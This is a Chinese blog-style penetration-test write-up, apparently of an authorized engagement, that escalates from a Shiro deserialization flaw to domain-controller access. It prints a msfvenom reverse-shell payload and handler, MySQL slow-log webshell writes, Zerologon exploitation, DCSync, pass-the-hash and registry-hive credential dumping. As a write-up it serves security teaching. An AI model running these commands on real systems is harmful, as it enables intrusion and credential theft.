热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

一步步获取你的核心权限

 背景最近都在做渗透测试项目,并不需要内网渗透,少了很多的成就感。于是,找了一个授权的企业项目,目标是获取内网核心权限,手段不限。这就好说了,就喜欢这种能让我胡乱来的目标。 入口对于企业而言,散落在外

 

背景

最近都在做渗透测试项目,并不需要内网渗透,少了很多的成就感。于是,找了一个授权的企业项目,目标是获取内网核心权限,手段不限。这就好说了,就喜欢这种能让我胡乱来的目标。

 

入口

对于企业而言,散落在外的资产肯定还有不少,于是为了快速打点,先进行一波常规的信息收集。先进行了子域名爆破、fofa、谷歌等方式找到多个子域,通过其中一个子域名反查找IP,在历史解析记录中找到了真实的IP,再继续进行C段端口扫描,收集到了多个资产列表。扔进XRAY跑一波,在其中的一个资产中,发现了存在shiro反序列话漏洞,手工来测试一下:

github上找个了工具尝试一下,发现可以执行命令:

查看了一下进程后,发现web是以jar包启动的,无法直接写入shell,直接尝试写内存shell:

成功写入了蚁剑的shell,先本地配置一下,并设置Accept-Header为:thisIsMyJob!@

设置好后直接连接,获取webshell:

 

内网漫游

翻看了一下这台linux上的文件,由于linux权限不够,无法查看shadow,尝试提权也均失败了,查看历史命令、计划任务等,并未有什么收获。只能下载jar包下来分析,找到了mysql数据库的配置密码。于是先探测一下内网,看能否快速的拿到其他主机的权限,不行再从数据库入手看看。

因此,先做了个代理,配置一下frp,先上传客户端到web上,修改了一下frpc.ini文件,使用sock代理:

自己的VPS上传服务端,修改一下权限,直接执行./frps -c frps.ini:

然后回到客户端执行一下./frpc -c frpc.ini,即可使用。

本地使用proxifier代理一下:

先使用弱口令爆破工具爆破一波看看,果然有点东西,找到了两台linux弱口令:

继续翻文件,还是一无所获,浪费了很多时间。可能核心业务不在linux上,尝试一下能否获取一个windows权限。先试试ms17-010漏洞,先生成一个木马:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=2233 -f elf > linux.elf

上传到web上,本地msf监听一下:

use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp show options set LHOST 1.1.1.1 set LPORT 23333 run

在web的命令行下给linux.elf添加执行权限后直接运行,即可获取到meterpreter。然后再添加一下路由:

使用17-010扫描模块跑一下:

未扫到任何漏洞,怀疑是不是哪里有问题,本地代理用工具再跑一次:

确实不存在,这补丁确实都打了,白忙活了一场。想到之前还有个数据库的连接串还没利用,可能还有点搞头。由于之前代理过了,直接使用navicat连接数据库,查看一下mysql版本是5.7:

由于secure-file-priv的存在,无法尝试提权。nmap扫描了一下数据库的ip地址,发现8090端口还存在一个php系统,服务器是server。于是先查询一下mysql的数据库文件路径,发现不是phpstudy或者wamp等软件一键搭建的:

可要想获取shell,前提要得到web路径,才能写入木马,通过web报错页面、目录扫描都未获取到。于是开始尝试一下IIS的默认路径c:\Inetpub\wwwroot\,写入后访问不到。想到mysql是放在d盘下,因此尝试d盘的d:\www、d:\Inetpub\wwwroot\、d:\data等路径,都没访问到,最终随手测了下d:\web,竟成功写入。通过mysql慢日志写shell过程如下:

set global slow_query_log=’ON’; set global slow_query_log_file=’D:/web/cmd.php’; select ‘’ or sleep(11); set global slow_query_log=’OFF’;

由于存在杀软,普通的一句话木马直接被杀,因此重新写入一个冰蝎的马:

set global slow_query_log=’ON’; set global slow_query_log_file=’D:/web/t.php’; select ‘’ or sleep(11); set global slow_query_log=’OFF’;

写入后直接访问t.php,重新生成.1.php的冰蝎马,直接连接:

查看一下系统权限,有点低:

查看一下ip地址:

由于是该台服务器server2012,无法直接获取windows密码,且存在国外某某科技的杀软,已有的提权工具都被杀了,技术不行绕不过,还是换个思路。

于是,开始翻找文件,看是否会有敏感信息。在服务器上发现多套源码,在其中的一个文件里发现了配置信息:

尝试连接数据库,失败!!

通过这收集到的密码,再做成密码字典,开始爆破C段的RDP、mysql、sqlserver、ftp等服务:

爆破后,发现是当前服务器的administrator密码,通过之前的端口信息收集发现开放了3389端口,可以远程登录。

还是继续进行信息收集,查看当前服务器是否是域内机器,若存在域就相对好很多。执行:

net time /domain

发现是存在域的。查看一下域控机器:

net group “domain controllers” /domain

获取一下域控的IP地址:

目前知道当前的机器在域内,并有了服务器的管理员权限。可以尝试通过导出hash的方式获取域账号信息,再进行PTH。因此,直接远程连接,右键导出lsass.exe进程的dump文件,再上传免杀的mimikatz进行读取,但最终读取失败:

看来只能通过其他方法了,联想到前不久爆出的NetLogon权限提升漏洞,可以尝试一下,毕竟时间过得不久,可能都还没打补丁。

使用github上的搜到的脚本尝试一下,先验证是否存在漏洞:

python3 zerologon_tester.py DC 10.100.1.231

返回success,表示存在漏洞。

使用cve-2020-1472-exploit.py将机器账户重置:

使用DCSync导出域内所有用户凭据:

通过wmic进行pass the hash,可拿到域控制器中的管理员权限:

至此,已经拿到核心权限了,截了个图,赶紧恢复一下机器账号的密码,不然脱域问题就大了。

先导出SAM数据库文件,下载回来后,记得删除:

reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save get system.save get sam.save get security.save del /f system.save del /f sam.save del /f security.save

通过sam等文件获得原ntlm hash:

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

通过获取到的$MACHINE.ACC账户的hash,进行恢复:

 

总结

这次的渗透,主要是通过外网的shiro漏洞上传内存马,快速打点,以此做跳板进入内网。再通过源码获取数据库配置文件,尝试获取到数据库服务器的普通权限后,继续信息收集,获取到本地管理员权限,发现服务器在域内,且存在NetLogon漏洞,此后成功获取域控。


推荐阅读
  • Metasploit攻击渗透实践
    本文介绍了Metasploit攻击渗透实践的内容和要求,包括主动攻击、针对浏览器和客户端的攻击,以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码,以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]
  • 本文介绍了Oracle数据库中tnsnames.ora文件的作用和配置方法。tnsnames.ora文件在数据库启动过程中会被读取,用于解析LOCAL_LISTENER,并且与侦听无关。文章还提供了配置LOCAL_LISTENER和1522端口的示例,并展示了listener.ora文件的内容。 ... [详细]
  • 腾讯安全平台部招聘安全工程师和数据分析工程师
    腾讯安全平台部正在招聘安全工程师和数据分析工程师。安全工程师负责安全问题和安全事件的跟踪和分析,提供安全测试技术支持;数据分析工程师负责安全产品相关系统数据统计和分析挖掘,通过用户行为数据建模为业务决策提供参考。招聘要求包括熟悉渗透测试和常见安全工具原理,精通Web漏洞,熟练使用多门编程语言等。有相关工作经验和在安全站点发表作品的候选人优先考虑。 ... [详细]
  • 本文介绍了Python高级网络编程及TCP/IP协议簇的OSI七层模型。首先简单介绍了七层模型的各层及其封装解封装过程。然后讨论了程序开发中涉及到的网络通信内容,主要包括TCP协议、UDP协议和IPV4协议。最后还介绍了socket编程、聊天socket实现、远程执行命令、上传文件、socketserver及其源码分析等相关内容。 ... [详细]
  • 本文介绍了在Mac上搭建php环境后无法使用localhost连接mysql的问题,并通过将localhost替换为127.0.0.1或本机IP解决了该问题。文章解释了localhost和127.0.0.1的区别,指出了使用socket方式连接导致连接失败的原因。此外,还提供了相关链接供读者深入了解。 ... [详细]
  • Linux如何安装Mongodb的详细步骤和注意事项
    本文介绍了Linux如何安装Mongodb的详细步骤和注意事项,同时介绍了Mongodb的特点和优势。Mongodb是一个开源的数据库,适用于各种规模的企业和各类应用程序。它具有灵活的数据模式和高性能的数据读写操作,能够提高企业的敏捷性和可扩展性。文章还提供了Mongodb的下载安装包地址。 ... [详细]
  • 本文介绍了django中视图函数的使用方法,包括如何接收Web请求并返回Web响应,以及如何处理GET请求和POST请求。同时还介绍了urls.py和views.py文件的配置方式。 ... [详细]
  • 如何利用 Myflash 解析 binlog ?
    本文主要介绍了对Myflash的测试,从准备测试环境到利用Myflash解析binl ... [详细]
  • 本文详细介绍了在Centos7上部署安装zabbix5.0的步骤和注意事项,包括准备工作、获取所需的yum源、关闭防火墙和SELINUX等。提供了一步一步的操作指南,帮助读者顺利完成安装过程。 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • 在CentOS/RHEL 7/6,Fedora 27/26/25上安装JAVA 9的步骤和方法
    本文介绍了在CentOS/RHEL 7/6,Fedora 27/26/25上安装JAVA 9的详细步骤和方法。首先需要下载最新的Java SE Development Kit 9发行版,然后按照给出的Shell命令行方式进行安装。详细的步骤和方法请参考正文内容。 ... [详细]
  • CentOS 7部署KVM虚拟化环境之一架构介绍
    本文介绍了CentOS 7部署KVM虚拟化环境的架构,详细解释了虚拟化技术的概念和原理,包括全虚拟化和半虚拟化。同时介绍了虚拟机的概念和虚拟化软件的作用。 ... [详细]
  • 使用正则表达式爬取36Kr网站首页新闻的操作步骤和代码示例
    本文介绍了使用正则表达式来爬取36Kr网站首页所有新闻的操作步骤和代码示例。通过访问网站、查找关键词、编写代码等步骤,可以获取到网站首页的新闻数据。代码示例使用Python编写,并使用正则表达式来提取所需的数据。详细的操作步骤和代码示例可以参考本文内容。 ... [详细]
  • 背景应用安全领域,各类攻击长久以来都危害着互联网上的应用,在web应用安全风险中,各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细]
  • Apache Shiro 身份验证绕过漏洞 (CVE202011989) 详细解析及防范措施
    本文详细解析了Apache Shiro 身份验证绕过漏洞 (CVE202011989) 的原理和影响,并提供了相应的防范措施。Apache Shiro 是一个强大且易用的Java安全框架,常用于执行身份验证、授权、密码和会话管理。在Apache Shiro 1.5.3之前的版本中,与Spring控制器一起使用时,存在特制请求可能导致身份验证绕过的漏洞。本文还介绍了该漏洞的具体细节,并给出了防范该漏洞的建议措施。 ... [详细]
author-avatar
建哥2502897913
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有